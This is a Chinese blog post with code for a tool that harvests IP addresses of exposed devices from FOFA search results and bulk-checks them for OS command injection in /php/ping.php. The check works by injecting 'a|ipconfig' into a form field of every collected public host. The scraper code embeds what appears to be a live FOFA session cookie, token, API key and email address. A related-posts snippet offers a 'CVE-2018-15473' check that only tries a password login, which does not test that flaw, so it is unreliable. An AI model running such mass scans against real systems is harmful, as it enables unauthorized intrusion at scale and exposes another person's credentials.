基于fofa的批量cve漏洞验证爬虫程序开发

最新推荐文章于 2024-04-21 16:30:41 发布
最新推荐文章于 2024-04-21 16:30:41 发布
阅读量1.3k 收藏 11
点赞数 14
文章标签: 爬虫
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WonderfulUUZ/article/details/135628930
版权

漏洞复现

FOFA查询语句:icon_hash=“-1830859634”
该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入,执行任意命令
图片.png
图片.png

fofa指纹搜索

图片.png正常我们是fofa搜指纹,然后一个一个抓包验证

python批量爬取fofa搜索结果

爬虫可以简单理解为模拟成浏览器,取访问爬取数据
一般在请求头里面加上,User-agent,cookie等等,有时候爬取不到信息,可能就是模拟的力度不够大
图片.png

import requests
url='https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTgzMDg1OTYzNCI%3D'
header={
    'Cookie':'ga=GA1.1.576012199.1699060653; __fcd=IDlpZX5ieCF7Uc1hehEWf4dU; fofa_token=eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MzUxMDc2LCJtaWQiOjEwMDIwMTI0NSwidXNlcm5hbWUiOiJ3b25kZXJmdWxVVVUiLCJleHAiOjE3MDUxMjQ3ODh9.FQocF4DcbG9lWG3kwEFXwxfkZUCxYdn2Mp1saUbir09qjaQhu1rQtXDAeDmVfpbVFsVoA2PJlwmSUu_QngeIVw; user=%7B%22id%22%3A351076%2C%22mid%22%3A100201245%2C%22is_admin%22%3Afalse%2C%22username%22%3A%22wonderfulUUU%22%2C%22nickname%22%3A%22wonderfulUUU%22%2C%22email%22%3A%221569676321%40qq.com%22%2C%22avatar_medium%22%3A%22https%3A%2F%2Fnosec.org%2Fmissing.jpg%22%2C%22avatar_thumb%22%3A%22https%3A%2F%2Fnosec.org%2Fmissing.jpg%22%2C%22key%22%3A%22a283f5e9560c2cadac2cb109d047699a%22%2C%22category%22%3A%22user%22%2C%22rank_avatar%22%3A%22%22%2C%22rank_level%22%3A0%2C%22rank_name%22%3A%22%E6%B3%A8%E5%86%8C%E7%94%A8%E6%88%B7%22%2C%22company_name%22%3A%22wonderfulUUU%22%2C%22coins%22%3A0%2C%22can_pay_coins%22%3A0%2C%22fofa_point%22%3A0%2C%22credits%22%3A1%2C%22expiration%22%3A%22-%22%2C%22login_at%22%3A0%2C%22data_limit%22%3A%7B%22web_query%22%3A300%2C%22web_data%22%3A3000%2C%22api_query%22%3A0%2C%22api_data%22%3A0%2C%22data%22%3A-1%7D%2C%22expiration_notice%22%3Afalse%2C%22remain_giveaway%22%3A0%2C%22fpoint_upgrade%22%3Afalse%7D; isRedirectLang=1; is_flag_login=0; befor_router=; is_mobile=pc; baseShowChange=false; viewOneHundredData=false; _ga_9GWBD260K9=GS1.1.1704931338.18.1.1704931584.0.0.0',
    'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
}
resp=requests.get(url=url,headers=header)
page_text=resp.content.decode('utf-8')
print(page_text)

图片.png页面爬出来之后,利用xpath把我们需要的ip地址给爬取下来
图片.png
先看一下网页源代码,是在div=>span=>a=>href
图片.png爬取出ip地址后我们要存到文件中,而且要保证它的顺序,不能乱码
图片.png我们这里的xpath提取出来的其实是列表数据,需要用join方法转成字符串
图片.png图片.png
接下来我们考虑的是批量从fofa获取资产,不局限于第一页,我们看第二页
图片.png这里我们用一个for循环
图片.png
还有一个就是写数据到txt中时,是一个增量数据,需要改一下写入模式为add
图片.png
另外优化的地方,我们如果要拓展其他的指纹来搜索,我们观察一下他搜索的参数
图片.png
其实是一个base64的加密
图片.png
我们把需要base加密的部分再分割一下,加密过后再拼接上去
图片.png

批量验证程序

图片.png
先写验证一个链接的程序
图片.png
图片.png
因为这是一个post请求,所以要设置一下data,我们要转成python能够读取的字典格式
图片.png
很多时候是https的链接,我们需要设置一下参数,忽略掉告警
图片.png
图片.png我们来观察一下这个响应的特征
图片.png图片.png找一下出现漏洞的时候响应数据有哪些共同的特质
首先子网掩码这个255.255肯定是有的,也有一些其他的特征,解码之后可能更加准确
图片.png
批量打开之前的地址文件
图片.png
图片.png
还有一个问题就是很多链接是有问题的,状态码是400,500还有响应超时等等问题
这个时候就需要考虑到程序的健壮性,可以忽略掉报错,持续的运行
图片.png

import requests
with open('test.txt', 'r') as file:
    for line in file:
        url=line.strip()#去除每行空格

        #url ='https://119.188.246.32'
        payload='/php/ping.php'
        all_url=url+payload
        #print(all_url)
        data={
            'jsondata[ip]':'a|ipconfig',
            'jsondata[type]':'1'
        }
        try: 
            resp=requests.post(url=all_url,data=data,verify=False,timeout=10)
            #resp=requests.post(url=all_url,data=data,verify=False)
            # 从响应中获取HTTP状态码
            r_code = resp.status_code
            requests.packages.urllib3.disable_warnings()
            page_text=resp.content.decode('utf-8')
            #print(page_text)
            if '255.255' in page_text:
                print(all_url,'有漏洞')
                all_data=all_url+'\n'
                with open('test_yanzh.txt','a') as fp:
                    fp.write(all_data)
            else:
                print(all_url,'无漏洞')
        # 处理超时异常
        except requests.exceptions.Timeout:
            print(f"{all_url} 请求超时")
        # 处理其他请求相关的异常
        except requests.exceptions.RequestException as e:
            print(f"{all_url} 请求发生异常: {e}")
WonderfulUUZ
关注
  • 14
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络空间搜索引擎- FOFA的使用技巧总结
黄乔国PHP
12-17 6949
FOFA是一款网络空间测绘的搜索引擎,旨在帮助用户以搜索的方式查找公网上的互联网资产。FOFA的查询方式类似于谷歌或百度,用户可以输入关键词来匹配包含该关键词的数据。不同的是,这些数据不仅包括像谷歌或百度一样的网页,还包括像安全设备,摄像头、打印机、数据库、操作系统,中间件等资产。网络空间测绘可以被认为是网络空间的“MAP”。就像谷歌地图或高德地图通过卫星图像对地形进行测绘,网络空间测绘也是通过技术探针(爬虫)对全球网络资产进行探测。然而,网络空间分为公网和内网。FOFA主要针对。
【终极FOFA组合语法指南】如何用FOFA打出组合拳搜索目标资产?
鹅子鱼的博客:很菜但是很好学的小菜鸟
04-20 4691
【终极FOFA组合语法指南】如何用FOFA更快、更准、更专地搜索目标资产?
开发实战(5)--fofa进行漏洞poc的信息收集
最新发布
weixin_72543266的博客
04-21 1949
突破fafa信息采集时只能查看5页数据, 主要还是围绕渗透测试的流程进行开发,一般在信息收集后,在渗透测试后,在发现通用型漏洞时,我们为了节省时间,可以通过写批量脚本来信息收集,然后使用poc来进行批量验证.作为一个fofa工程师,那么我们当然是使用fofa进行信息搜集喽,刚好也借着这个机会熟悉一下fofa的API文档,为后面写利用工具做好铺垫,当然目前还是用不到API的,问就是用不起,所以只能写脚本突破注册会员限制进行信息爬取。
Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习
weixin_58085973的博客
04-18 200
【代码】Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习。
XrayFofa:一款将xray和fofa完美结合的自动化工具,调用fofaAPI进行查询扫描,新增爬虫爬取扫描(懒人必备)
04-22
XrayFofa :party_popper::party_popper::party_popper: 一款将xray和fofa结合运行的脚本,配置方法参考了piaolin大佬写的 增加了一些自己的想法(望指正),点个小星星支持一下吧:rose::rose::rose: XrayFofa git克隆下载:git clone 克隆下载需安装第三方库: python3 -m pip install requests pyyaml lxml 更新 1.4.0 修复了普通会员启动时出bug(fofa普通会员只能API查询数据100条的硬性规定我是真的无能为力,只能提醒一下一下啦) 增加了xray plugins的自定义模式,可以随意自定义自己需要的plugins 1.3.0 修复了fofa API 调用问题(应该没啥问题了) 对代码进行了简单的优化,fofa API 连不上时不会出现 报错一堆的情况了 1.2.0 更新 fofareptile 功能,使用python爬虫爬取fofa搜索结果,利用fof
fofa爬虫
weixin_45111459的博客
05-25 2116
今天想实战下上fofa找几个网站,fofa高级会员有点贵,用的一个共享号 当天请求过多,明天再试,恩,那不调用api了,自己写一个爬虫,获取web界面的总行了吧 多线程爬取 3.8s 下面是异步爬取 2.16s,还是快得到点的哈 代码都放下边 异步的 import requests import base64 import time from concurrent.futures import ThreadPoolExecutor import aiohttp import .
fofa爬虫(刷漏洞平台好方法)
xxx9686的博客
09-20 594
关键词一行一个,fofa.txt文本内容为关键词,target内容为结果,直接与Xray_Rad_Fusion放在同一个目录下执行即可联动。创建两个文本,文本名:fofa.txt+target.txt。支持多关键词爬虫,适合于rad+xray联动。可挂在服务器上刷漏洞
基于java的fofa爬虫
realmels的博客
12-20 1052
顾名思义,fofa爬虫。可以用api爬,也可以对页面进行爬取。开发环境是java11,基于maven和javafx做的。想做这个很久了,但是一直懒得弄。就偶尔写一下,不知不觉就写好了。看下运行效果吧。
CVE-2015-1805漏洞验证
05-17
用于验证CVE-2015-1805漏洞,该漏洞攻击将导致部分手机出现崩溃重启和提权
weblogic 漏洞统计 CVE
09-18
1.CVE-2016-0696 2.CVE-2016-0700 3.CVE-2016-0675 4.CVE-2016-3416 5.CVE-2016-0688 6.CVE-2016-0638 7.CVE-2015-2623 8.CVE-2015-4744 9.CVE-2014-2480 10.CVE-2014-2481 11.CVE-2014-4256 12.CVE-2014-4242 ...
基于SVM的CVE漏洞分类框架构造 (2013年)
05-29
针对CVE字典缺少分类和...该CVE分类器根据不同的分类特征对CVE进行分类,在支持向量机的帮助下,CVE分类器自动地从相关的漏洞数据库(包括BID,X-Force和Secunia)中抽取训练数据 ,并基于该训练数据为分类特征建立学习模型。
fofa爬虫工具开发篇
qq_51143448的博客
06-19 1077
不一样的fofa爬虫开发
fofa自动化爬虫脚本更新+详解
qq_50854662的博客
09-23 1133
fofa自动化爬虫脚本更新+详解 起因 最近要用到fofa爬虫,为什么要用爬虫不用api,问就是穷,想起来之前写过一个相关的脚本:Fofa-python-脚本,是很久以前写的了,之前写的时候有点问题,昨天重新修改了一下,记录一下整个过程 关于fofa 在其他大佬博客上摘抄的FOFA简介及使用教程 FOFA 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度等。 FOFA 搜索引擎检索到.
Python教程:如何用Python编写FOFA爬虫获取信息?
weixin_43263566的博客
05-28 2391
Python教程:如何用Python编写FOFA爬虫获取信息?
爬虫学习日记第八篇(爬取fofa某端口的协议排行及其机器数目,统计top200协议)
开心星人的博客
10-20 916
遍历端口,统计各个协议对应的机器数目(不准,但能看出个大概)通过fofa搜索端口,得到协议排名前五名和对应机器的数目。页面动态加载,由于动态渲染的问题,有的请求返回结果为空。API需要会员,一天只能访问1000次。手动登录获取cookie代码。找到最常用的200个协议。单线程,未登录爬虫代码。登录账号的单线程爬虫
fofa搜索漏洞技巧
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-08 3378
fofa搜索漏洞技巧整理,主要有以下十个方面:搜索HTTP响应头中含有"thinkphp"关键词的网站和IP;加上标题带有后台的;加上时间,现在新网站有thinkphp日志泄露的有很多; 搜索html正文中含有"管理后台"关键词的网站和IP body="管理后台"等。 fofa搜索漏洞技巧整理1、搜索HTTP响应头中含有"thinkphp"关键词的网站和IP。 header="thinkphp" && country="CN"
cve-2018-15473的漏洞验证脚本
07-27
您好!以下是一个用于验证CVE-2018-15473漏洞的简单脚本示例: ```python import paramiko def check_vulnerability(host, port, username, password): try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(host, port=port, username=username, password=password) print("漏洞 CVE-2018-15473 未被修复") client.close() except paramiko.AuthenticationException: print("漏洞 CVE-2018-15473 已被修复") except Exception as e: print("发生异常:", str(e)) # 使用示例 host = "目标主机IP" port = 22 # SSH端口,默认为22 username = "登录用户名" password = "登录密码" check_vulnerability(host, port, username, password) ``` 请确保安装了paramiko库(可以使用`pip install paramiko`进行安装),并将脚本中的目标主机IP、登录用户名和登录密码替换为实际值。 这个脚本尝试使用paramiko库连接到目标主机,如果成功连接,则说明漏洞CVE-2018-15473仍然存在;如果出现`AuthenticationException`异常,则说明漏洞已经被修复。对于其他异常情况,可以根据实际需要进行处理。 请注意,漏洞验证脚本仅供参考,并不能保证完全准确和全面,建议在合法授权和测试范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值